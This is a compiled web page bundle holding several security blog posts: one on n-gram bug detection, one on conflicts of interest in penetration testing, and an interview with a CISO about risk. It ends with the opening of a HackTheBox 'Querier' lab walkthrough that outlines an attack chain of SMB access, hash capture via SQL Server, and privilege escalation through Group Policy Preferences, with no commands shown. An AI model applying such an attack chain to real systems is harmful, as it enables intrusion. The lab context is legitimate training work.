above.\"})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Finding bugs in code via n-gram analysis.\"})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Make code more natural by enforcing coding conventions, i.e. a special kind of linting.\"})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Generate pseudo-code or documentation automatically.\"})})]}),/*#__PURE__*/t(\"p\",{children:['Of course, all these applications require, as do the ones we have previously presented, a useful representation of code in a way that it is always referred to as \"machine learning\" algorithms. This comes as no surprise if you have been following our previous series. The methods chosen for this particular application are Abstract Syntax Trees, and an adaptation of ',/*#__PURE__*/e(\"code\",{children:\"word2vec\"}),\" for code, aptly named \",/*#__PURE__*/e(\"code\",{children:\"code2vec\"}),\".\"]}),/*#__PURE__*/t(\"p\",{children:[\"With representation out of the way, let\u2019s dive into the actual methods. The main idea behind bug finding via n-gram analysis is to decompose every function into n-grams that represent their elements, such as \",/*#__PURE__*/e(\"code\",{children:\"API\"}),\" calls, variable names, etc. Then, compare them to one another for similarity. If we find rare (with low-occurrence frequency) n-grams that are highly similar to common (high-occurrence frequency) code, then the rare ones are probably buggy and worthy of further analysis. Take for example the following snippets from \",/*#__PURE__*/e(o,{href:\"https://pig.apache.org/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Apache Pig\"})}),\".\"]}),/*#__PURE__*/e(\"img\",{alt:\"snippets\",className:\"framer-image\",height:\"400\",src:\"https://framerusercontent.com/images/jSPtXAP1k8RwjKDR59ogpcby0.png\",srcSet:\"https://framerusercontent.com/images/jSPtXAP1k8RwjKDR59ogpcby0.png?scale-down-to=512 512w,https://framerusercontent.com/images/jSPtXAP1k8RwjKDR59ogpcby0.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/jSPtXAP1k8RwjKDR59ogpcby0.png 1920w\",style:{aspectRatio:\"1920 / 800\"},width:\"960\"}),/*#__PURE__*/e(\"h6\",{children:\"Snippets found by Bugram.\"}),/*#__PURE__*/t(\"p\",{children:[\"The above snippet is buggy due to the lack of \",/*#__PURE__*/e(\"code\",{children:\"toString\"}),\". In fact, it is exactly the same as the other snippet, only without \",/*#__PURE__*/e(\"code\",{children:\"toString\"}),\". \",/*#__PURE__*/e(\"code\",{children:\"Bugram\"}),\" suggested it as a possible bug because it was so similar to a commonly occurring snippet. The bug was reported to the \",/*#__PURE__*/e(\"code\",{children:\"Pig\"}),\" team and confirmed. In the test proposed by the paper, \",/*#__PURE__*/e(\"code\",{children:\"Bugram\"}),\" was able to find 42 confirmed bugs plus 17 false positives across 16 well-known open source \",/*#__PURE__*/e(\"code\",{children:\"Java\"}),\" projects such as \",/*#__PURE__*/e(\"code\",{children:\"Pig\"}),\".\"]}),/*#__PURE__*/t(\"p\",{children:[\"This approach, while simple and effective, is not without drawbacks, namely, that the weapon cannot be focused on security-related bugs or any specific kind of bug. The same authors later proposed an approach based on \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/blog/deep-hacking/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"deep learning\"})}),\" rather than \",/*#__PURE__*/e(\"em\",{children:\"n\"}),\"-grams, but again with the same aim of predicting software \",/*#__PURE__*/e(\"em\",{children:\"defects\"}),\" in general.\"]}),/*#__PURE__*/t(\"p\",{children:[\"Another possible application of \",/*#__PURE__*/e(\"em\",{children:\"n\"}),\"-gram analysis that might indirectly contribute to writing more \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/products/secure-code-review\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"secure code\"})}),' follows the idea that \"cleaner code leads to secure code\". If a person\u2019s writing style can be learned by ',/*#__PURE__*/e(\"em\",{children:\"n\"}),\"-gram analysis, the same can be true of a particular coder\u2019s style, or even a whole software project. Take for example our very last Asserts closure checker engine. Not only do we stick to the \",/*#__PURE__*/e(\"code\",{children:\"Python\"}),\" guidelines when naming variables and methods, and separating words by underscores, we also have a particular way of naming functions.\"]}),/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"strong\",{children:\"Sample function names from \"}),/*#__PURE__*/e(\"code\",{children:/*#__PURE__*/e(\"strong\",{children:\"Asserts\"})}),/*#__PURE__*/e(\"strong\",{children:\".\"})]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"fluidasserts.proto.http.can_brute_force\\nfluidasserts.proto.http.has_dirlisting\\nfluidasserts.proto.smb.is_anonymous_enabled\\nfluidasserts.cloud.aws.iam.has_not_support_role\",language:\"Python\"})})}),/*#__PURE__*/t(\"p\",{children:[\"Do you see a tendency here? So did \",/*#__PURE__*/e(\"code\",{children:/*#__PURE__*/e(o,{href:\"http://groups.inf.ed.ac.uk/naturalize/#\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Naturalize\"})})}),', a project that tries to \"learn natural coding conventions\" in order to improve naming suggestions. The goal is to infer a good name for a function given its code. That is to say, if I know what it does, I should be able to know what its name is, assuming that the names are not entirely random or ',/*#__PURE__*/e(o,{href:\"http://www2.imm.dtu.dk/courses/02161/2018/files/how_to_write_unmaintainable_code.pdf\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"humorously unmaintainable\"})}),\".\"]}),/*#__PURE__*/t(\"p\",{children:[\"Behind the scenes \",/*#__PURE__*/e(\"code\",{children:\"Naturalize\"}),\" uses natural language processing techniques, such as \",/*#__PURE__*/e(\"em\",{children:\"n\"}),\"-gram analysis to suggest more \",/*#__PURE__*/e(\"em\",{children:\"natural-sounding\"}),\" names to identifiers. This is the one place where developers can get creative, perhaps affecting the overall readability or fitting into project conventions. The package can be integrated in the development pipeline such as a \",/*#__PURE__*/e(\"code\",{children:\"pre-commit\"}),\" hook or during developing as an \",/*#__PURE__*/e(\"code\",{children:\"Eclipse\"}),\" plugin.\"]}),/*#__PURE__*/e(\"img\",{alt:\"Naturalize Eclipse\",className:\"framer-image\",height:\"250\",src:\"https://framerusercontent.com/images/ePEvlBFBXyH1gmQxkxM0PbFonbE.png\",srcSet:\"https://framerusercontent.com/images/ePEvlBFBXyH1gmQxkxM0PbFonbE.png?scale-down-to=512 512w,https://framerusercontent.com/images/ePEvlBFBXyH1gmQxkxM0PbFonbE.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/ePEvlBFBXyH1gmQxkxM0PbFonbE.png 1920w\",style:{aspectRatio:\"1920 / 500\"},width:\"960\"}),/*#__PURE__*/e(\"h6\",{children:\"Naturalize Eclipse plugin at work.\"}),/*#__PURE__*/t(\"p\",{children:[\"As can be seen here \",/*#__PURE__*/e(\"code\",{children:\"each\"}),\" is not considered to be a very descriptive or convention-conforming name, so \",/*#__PURE__*/e(\"code\",{children:\"testClass\"}),\" is suggested as a better alternative.\"]}),/*#__PURE__*/e(\"p\",{children:'Natural Language Processing has moved beyond the \"natural language\" line and is moving increasingly into the \"machine learning\" or \"artificial intelligence\" arena. Natural Language Processing will soon have a wider scope of purposes, such as static code analysis, bug finding, and potentially, vulnerability detection. In the future, we are more likely to encounter more applications of NLP in the least expected places.'}),/*#__PURE__*/e(\"h2\",{children:\"References\"}),/*#__PURE__*/t(\"ul\",{children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[\"S. Wang, D. Chollak, D. Movshovitz-Attias, and L. Tan. \",/*#__PURE__*/e(\"em\",{children:\"Bugram: Bug detection with N-gram Language Models\"}),\". \",/*#__PURE__*/e(o,{href:\"https://ece.uwaterloo.ca/~s446wang/paper/ase-16-1.pdf\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"ASE 2016\"})}),\".\"]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[\"M. Allamanis, E. Barr, C. Bird, C. Sutton. \",/*#__PURE__*/e(\"em\",{children:\"Learning Natural Coding Conventions\"}),\". \",/*#__PURE__*/e(o,{href:\"https://arxiv.org/pdf/1402.4182.pdf\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"arXiv\"})}),\".\"]})})]})]});export const richText2=/*#__PURE__*/t(a.Fragment,{children:[/*#__PURE__*/e(\"p\",{children:'Years ago, we faced something odd in a project: a customer was putting pressure on us while performing a \"one-shot hacking.\" The manager who hired us demanded preliminary results and made comments about how we should frame some of the findings, what to keep, and what to remove from the final report.'}),/*#__PURE__*/e(\"p\",{children:\"We decided not to adjust everything from the observations because those changes would misrepresent reality. After the presentation of the results, the manager shouted at us, and never hired us again. A conflict of interest was in place, but we made the right decision.\"}),/*#__PURE__*/t(\"p\",{children:[\"I have some questions for you, if you are a cybersecurity manager: who do you report to? What does your boss expect from you and your team? I bet IT is a likely candidate for the first. The relationship seems sensible, except for the auditing activities cybersecurity teams undertake. If a performance indicator for these departments is the number of findings in audits, there's a strong incentive to diminish cybersecurity conclusions. That's a conflict of interest. \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/blog/penetration-testing/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Penetration tests\"})}),\" should not be conducted to praise your good defenses. Instead, they should help you revealing your blind spots to improve decision-making, e.g., improving those defenses. Be skeptic if when an auditor finds nothing relevant.\"]}),/*#__PURE__*/e(\"p\",{children:\"Should cybersecurity units report to a different group other than IT? There are operational reasons to have cybersecurity operations running smoothly with IT. Even so, conflicts of values are not always clear, as we will see next.\"})]});export const richText3=/*#__PURE__*/t(a.Fragment,{children:[/*#__PURE__*/e(\"h2\",{children:\"What we get wrong about conflicts of interest\"}),/*#__PURE__*/e(\"p\",{children:\"We usually see conflicts of interest as a manifest fraud. Whenever one is detected, we favor to think is a product of a deliberate choice. Besides that, the usual practice is to disclose conflicts of interest. In some scenarios, disclosure forbids some actions or the occupancy of positions (i.e., in public institutions). In others, disclosure seems a reasonable step, by signaling trust in doing so.\"}),/*#__PURE__*/t(\"p\",{children:[\"The first thing to point is that not every conflict of interest is deliberated or conscious. Empirical evidence (\",/*#__PURE__*/e(o,{href:\"https://www.andrew.cmu.edu/user/gl20/GeorgeLoewenstein/Papers_files/pdf/Self-IntAutoPsychConflictInt.pdf\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Moore & Loewenstein, 2004\"})}),\"; \",/*#__PURE__*/e(o,{href:\"http://faculty.haas.berkeley.edu/tetlock/pdfsnewones/2006%20auditorsmooreetalpiece.pdf\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Moore, Tetlock, Tanlu & Bazerman, 2006\"})}),\") supports this; people engage in conflicts of interest because there's no perception of wrongdoing. Additionally, we are very prone to self-serving thoughts. We are hardwired to that, just like we are prone to mental shortcuts and cognitive biases. Interim takeaway: as security professionals, we should be more cautious in our jobs; we might be affecting business without noticing.\"]}),/*#__PURE__*/t(\"p\",{children:[\"A second misconception is that disclosure is an adequate countermeasure. Disclosure of conflicts of interest makes situations worse sometimes. Research has shown that disclosures, in some cases, worsen circumstances (\",/*#__PURE__*/e(o,{href:\"https://www.andrew.cmu.edu/user/gl20/GeorgeLoewenstein/Papers_files/pdf/dirtclean.pdf\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Cain, Loewenstein & Moore, 2005\"})}),\"; \",/*#__PURE__*/e(o,{href:\"https://www.cmu.edu/dietrich/sds/docs/loewenstein/WhenSunLightFails.pdf\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"2010\"})}),\"; \",/*#__PURE__*/e(o,{href:\"https://www.cmu.edu/dietrich/sds/docs/loewenstein/UnintendedConsq.pdf\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Loewenstein, Sah & Cain, 2012\"})}),\"). For example, acting as a permit to misbehavior (moral licensing) or to introducing large biases in advisory work (i.e., exaggerations).\"]}),/*#__PURE__*/t(\"p\",{children:[\"Who performs penetration testing for your organization? It is a critical question in light of previous insights. If those who handle the defenses (i.e., Security Operations Center \u2014SOC) are the same in charge of offensive operations, there is a conflict of interest you should address, and not by disclosure. That setting creates incentives that are likely to influence audit results. Think about it: if you are responsible for defenses, it is in your interest to show little holes or none at all. How do you ensure penetration testing is not biased to your favor? \",/*#__PURE__*/e(\"em\",{children:'\"\u2026\u200Bthe NSA\\'s dual mission of providing security and conducting surveillance means it has an inherent conflict of interest in cybersecurity,\"'}),\" \",/*#__PURE__*/e(o,{href:\"https://www.schneier.com/essays/archives/2009/03/who_should_be_in_cha.html\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"wrote Bruce Schneier\"})}),\" related to this years ago.\"]}),/*#__PURE__*/e(\"h2\",{children:\"Consequences\"}),/*#__PURE__*/e(\"p\",{children:\"Conflicts of interest pose at least two threats to businesses:\"}),/*#__PURE__*/t(\"p\",{children:[\"First, these conflicts \",/*#__PURE__*/e(o,{href:\"https://www.isaca.org/resources/isaca-journal/issues/2017/volume-2/the-validity-of-penetration-tests\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"undermine the validity of audit results.\"})}),\" It's tough to support findings when someone acts as jury and interested party. This translates to wasting valuable resources like time, effort, and money. Eventually, having non-credible results could harm one of the assets companies care the most: reputation.\"]}),/*#__PURE__*/e(\"p\",{children:\"Second, in the long run, organizations could also face other drawbacks. An illusion of control might emerge from audits involving conflicts, in the short term. Furthermore, a troublesome reality could unveil: your defenses aren't as strong as you think they are. That's a huge blind spot. Once you get challenged, by a third party or a real attacker, chances are you will struggle in facing the consequences. Even worse: the business case for cybersecurity audits you were leading might become a significant weakness.\"}),/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"strong\",{children:\"Fluid Attacks\"}),\" has, of course, confronted conflicts of interest. Our management team has always stressed the importance of our principles as cybersecurity experts, and to preserve independence in our work, delivering value to our customers. We have been successful in helping them as independent and skilled auditors, typically performing \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/services/continuous-hacking/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Continuous Hacking\"})}),\", a service to continuously check and improve robustness of defenses.\"]}),/*#__PURE__*/e(\"p\",{children:\"Our customers rely on our platform, the place to keep track of weaknesses. They don't have to worry much about managing findings on their IT assets; we make it easy for them by providing a tool to centralize everything.\"}),/*#__PURE__*/e(\"p\",{children:\"We want to share with you some advice in avoiding conflicts of interest, as concluding remarks:\"}),/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"strong\",{children:\"Take a long-term perspective.\"}),\" We see conflicts of interest as a game in which you can play for the short or the long-term. We strongly suggest you play the long, strategic one. Your success is never on the short-term; cybersecurity is an infinite-game (in game-theory jargon). We encourage you to trust independent auditors like us. We are genuinely independent auditors because we do not provide design and operation of defenses for the market. Although we provide expert advice and curated resources on how to better protect information assets (check \",/*#__PURE__*/e(o,{href:\"https://help.fluidattacks.com/portal/en/kb/criteria/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:/*#__PURE__*/e(\"strong\",{children:\"Criteria\"})})}),\", it's free).\"]}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"Identify conflicts of interest and design environments to avoid them.\"})}),/*#__PURE__*/t(\"p\",{children:['\"\u2026\u200Bethical systems designers should be ruthless in identifying conflicts of interest and finding ways to create or restructure rules, procedures, other controls, and incentives to minimize them.\" (Source: ',/*#__PURE__*/e(o,{href:\"https://www.ethicalsystems.org/content/contextual-influences\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Ethical Systems\"})}),\".)\"]}),/*#__PURE__*/e(\"p\",{children:'We suggest you implement a policy forbidding \"goalkeepers\" to be the same as \"forward\" players. Additionally, don\\'t rely on disclosure, as it could backfire. A stronger stand is a must.'}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:'\"Consider the opposite.\"'})}),/*#__PURE__*/t(\"p\",{children:[\"This is a strategy to improve decision-making discussed by \",/*#__PURE__*/e(o,{href:\"https://static1.squarespace.com/static/5353b838e4b0e68461b517cf/t/538504d1e4b01dc8cdbaead5/1401226449434/how-can-decision-making-be-improved.pdf\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Milkman, Chugh, & Bazerman (2009)\"})}),\". In short, putting yourself in the exact opposite perspective of what you believe, could change your judgment, eventually affecting your decisions.\"]}),/*#__PURE__*/t(\"p\",{children:['\"Ask yourself what you want to be true (i.e., what is in your personal interest) or what you are inclined to believe. Then consider several possible reasons to go against it. Do this early in your decision process, especially when the decision is important.\u201D (Source: ',/*#__PURE__*/e(o,{href:\"https://www.ethicalsystems.org/content/contextual-influences\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Ethical Systems\"})}),\")\"]}),/*#__PURE__*/t(\"p\",{children:[\"Lastly, we encourage you to analyze \",/*#__PURE__*/e(\"strong\",{children:\"how you frame cybersecurity\"}),\" within your organization. Avoid describing it as an operational effort; frame it as strategic. By playing long-term, cybersecurity can be seen as a continuous process by which risks can be better managed, and for that, you need to permanently test yourself, to put pressure against your cyber walls, to learn from unseen weaknesses. Otherwise (operationally-framed), cybersecurity will succumb easily to short-termism and vanity metrics that might screw you up eventually.\"]})]});export const richText4=/*#__PURE__*/e(a.Fragment,{children:/*#__PURE__*/t(\"p\",{children:[\"In this post, we share the second part of our conversation with Nicol\\xe1s Acosta, Chief Information Security Officer (CISO) of \",/*#__PURE__*/e(o,{href:\"https://empresa.corona.co/nuestra-compania/quienes-somos\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Corona.\"})}),\" We spoke about risks, setbacks, and truths and falsehood in cybersecurity. If you have not read the first part \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/blog/innovation-understandable/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"click here to read it.\"})})]})});export const richText5=/*#__PURE__*/t(a.Fragment,{children:[/*#__PURE__*/e(\"h2\",{children:\"Risk management\"}),/*#__PURE__*/e(\"p\",{children:\"Thinking about risks is not easy, and risks are everything in cybersecurity. Furthermore, fitting cybersecurity risks with those of business is challenging. We wanted to discuss a bit about this topic with Nicol\\xe1s.\"}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"Is it difficult to quantify the risks you manage in monetary terms?\"})}),/*#__PURE__*/t(\"ol\",{style:{\"--list-style-type\":\"none\"},children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:['\"Remarkably difficult, as is usual in other fields. We have a traditional approach, and we face the same common issue: prioritization. Which risk is redder than the other reds? We still rely on probabilities and impact. Broadly speaking, the current approach to risks in cybersecurity has three commonalities: we are not good translating hazards to money; we are not good creating business cases for cybersecurity \u2014that\u2019s why it\u2019s often perceived as costly\u2014; finally, we are not good at achieving approvals for what we want to do. As a whole, cybersecurity is poorly understood, and we are responsible for that. I\u2019m not saying that we still speak in terms of ',/*#__PURE__*/e(\"code\",{children:\"IT\"}),\" assets to top management. Nevertheless, in Corona, we have started to build a new language to speak directly to the business, referring to risks. We have managed to speak in financial terms to senior executives by leveraging on the expected loss paradigm, something we came across by, among others, exchanging ideas with \",/*#__PURE__*/e(\"strong\",{children:\"Fluid Attacks.\"}),\" Though, it\u2019s still an enormous challenge. The \",/*#__PURE__*/e(\"em\",{children:\"expected loss\"}),\" indicator is not perfect, and it\u2019s complicated to understand. Nevertheless, it\u2019s the best approximation we have to speak in business terms. \",/*#__PURE__*/e(\"em\",{children:\"(Interested in Expected Loss? Take a look at \"}),/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/blog/risk-indicator-roundup/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:/*#__PURE__*/e(\"em\",{children:\"Risk Indicator Roundup.\"})})}),/*#__PURE__*/e(\"em\",{children:\")\"})]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[\"In organizations where security breaches translate quickly into money, it\u2019s easier to connect the dots. For instance, the risk of a successful hack targeting an online banking user with USD \",/*#__PURE__*/e(\"code\",{children:\"5,000\"}),' in his account is easy to quantify. However, a scenario where a hack reveals personal information or industrial secrets is not straightforward to numbers. In the latter, you have to analyze more. How much does it cost that someone steals you a food recipe or an industrial design? You just try to take what seems more readily available, for example, sales forecasts.\"']})})]}),/*#__PURE__*/e(\"h2\",{children:\"Setbacks\"}),/*#__PURE__*/e(\"p\",{children:\"How companies and cybersecurity teams face struggles are diverse. Nicol\\xe1s shared with us some of his setbacks as CISO.\"}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"What setback was particularly relevant for you as CISO?\"})}),/*#__PURE__*/e(\"p\",{children:'\"I think of technical and managerial examples:'}),/*#__PURE__*/e(\"p\",{children:\"In one occasion, we should have waited to deploy a protection. We proceeded, and in doing so, we also hindered major operations by taking down some critical systems. That was never the intention, but we ultimately caused the whole financial department of one of our companies to be halted for half a day.\"}),/*#__PURE__*/e(\"p\",{children:\"In another time, it was my first presentation to the board of directors. I assumed they were aware enough about cybersecurity, but that was plainly not the case. During my presentation, they started asking whether my topic was worthy of attention. They simply did not understand what I was conveying and I should have started by sensitizing the audience.\"}),/*#__PURE__*/e(\"p\",{children:'What I learned in both instances was pretty clear: not to rush when a control or protection is missing; chances are that some blind spots play a big role in the middle of the rush. Second, that the first contact with a board of directors should be focused on sensitization, even if they already are cybersecurity aware. Common language must be established from the beginning to succeed in the difficult task of speaking to the board.\"'}),/*#__PURE__*/e(\"h2\",{children:\"Truths and falsehoods in cybersecurity\"}),/*#__PURE__*/e(\"p\",{children:\"To conclude our conversation, we talked about what Nicol\\xe1s consider false in the discipline, as well as what is true. We wondered what a CISO like Nicol\\xe1s could tell us.\"}),/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"strong\",{children:\"What do you think is a \u2018lie\u2019 in cybersecurity,\"}),\" \",/*#__PURE__*/e(\"strong\",{children:\"but most people seem to believe in?\"})]}),/*#__PURE__*/e(\"p\",{children:'\"I sometimes see cybersecurity as a cult. For me, cybersecurity is not as severe as the market tries to show; people usually overestimate what happens. We are not the most targeted organization, although we receive daily attacks. And think about our size: we are a team of seven protecting a 10,000-people organization.'}),/*#__PURE__*/e(\"p\",{children:\"When there is \u2018no time\u2019? When are circumstances so urgent that you can\u2019t even blink? When are we \u2018on fire\u2019? It has happened once in the last seven years. In my previous job in a bank, it happened twice in about the same period. It\u2019s odd: I see a cult of stress, a cult of being relevant by being busy. It seems to me like an inertial thing that is just not true. I don\u2019t buy that stressful scenario we sometimes see on TV or the movies. Sometimes you do have to worry about and to act quickly to contain an incident, for sure, but it\u2019s not every day, not even every week. In my experience, cybersecurity is not that stressful.\"}),/*#__PURE__*/t(\"p\",{children:[\"In this discipline, \",/*#__PURE__*/e(\"strong\",{children:\"you don\u2019t have to do everything.\"}),\" You can leave to randomness some things. Take, for example, theft. Every day, people are a victim of some theft. Yet, local institutions don\u2019t place a policeman in every corner of the city. That\u2019s the value of the expected loss approach because it allows you to better weight your actions. \",/*#__PURE__*/e(\"strong\",{children:\"To do nothing\"}),\" is also a managerial decision. Sometimes it\u2019s better to accept that some incidents happen, and when they arrive, you deal with them. Not every time you get a fever, you go to the doctor. In cybersecurity is the same. We need to be sensible about cybersecurity.\"]}),/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"strong\",{children:\"Fluid Attacks\"}),\", for instance, I\u2019m certain will always manage to breach some of my protections in the projects we work together. How much do I have to invest to be immune to them? There is no point on that. I just accept that fact, and I protect from more likely scenarios. The lie is to go until the end. You have to know when to stop. Many professionals should discard the \",/*#__PURE__*/e(\"strong\",{children:\"go-until-the-end\"}),' idea\".']}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"And, what is \u2018a truth,\u2019 but most people don\u2019t seem to believe in?\"})}),/*#__PURE__*/t(\"p\",{children:['\"People and organizations usually think that nothing will ever happen to them. You hear from time to time \u201CIt will never happen.\u201D The truth is that something will happen eventually. The thing is, not as many people are aware of cyber risks. For more than 130 years, some events seemed to have never happened in our organization. It\u2019s better to say: for over ',/*#__PURE__*/e(\"code\",{children:\"130\"}),\" years, \",/*#__PURE__*/e(\"strong\",{children:\"we\u2019ve never known that something has happened.\"}),' Botnets exist; ransomware exists. If I\u2019m not cautious in my digital behaviors, something terrible could happen to me. So, It\u2019s vital to have \u201Chealthy\u201D digital habits. This is a game of balance, a game where you should never feel safe enough that controls just stop making sense, but at the same time, a game where you have to be mindful about how much you really have to do just for the sake of having a reasonable cybersecurity posture.\"']}),/*#__PURE__*/t(\"p\",{children:[\"We are thankful to Nicol\\xe1s for this conversation about our job as cybersecurity professionals. We hope you have enjoyed these insights from the lens of a CISO. Do you want to share your thoughts? \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/contact-us\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Do get in touch with us!\"})})]}),/*#__PURE__*/t(\"p\",{children:[\"And remember our solutions. Take a look at our \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/continuous-hacking\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Continuous Hacking\"})}),\". We can help you with detecting improvements in your cybersecurity operations, as we do it with Corona.\"]})]});export const richText6=/*#__PURE__*/e(a.Fragment,{children:/*#__PURE__*/t(\"p\",{children:[\"In my opinion, \",/*#__PURE__*/e(o,{href:\"https://www.hackthebox.com/machines/querier\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Querier\"})}),\" (HackTheBox medium-difficulty Windows machine) is a great box. By following the steps below we will learn a bit about Windows (a widely used operating system) \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/solutions/penetration-testing-as-a-service/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"pentesting\"})}),\". The challenge begins with a public SMB; this is our first challenge level. Next, we will work with SQL Server and we will need to use a special SQL query to get the user hash. Finally, we will take advantage of an insecure configuration in Group Policy Preferences in Windows to escalate to administrator privileges.\"]})});export const richText7=/*#__PURE__*/t(a.Fragment,{children:[/*#__PURE__*/e(\"h2\",{children:\"Scanning phase\"}),/*#__PURE__*/t(\"p\",{children:[\"The first thing to do is check the connection to the machine with a simple \",/*#__PURE__*/e(\"code\",{children:\"ping\"}),\" command. We need a stable connection with the box to make sure that we will not lose all of our 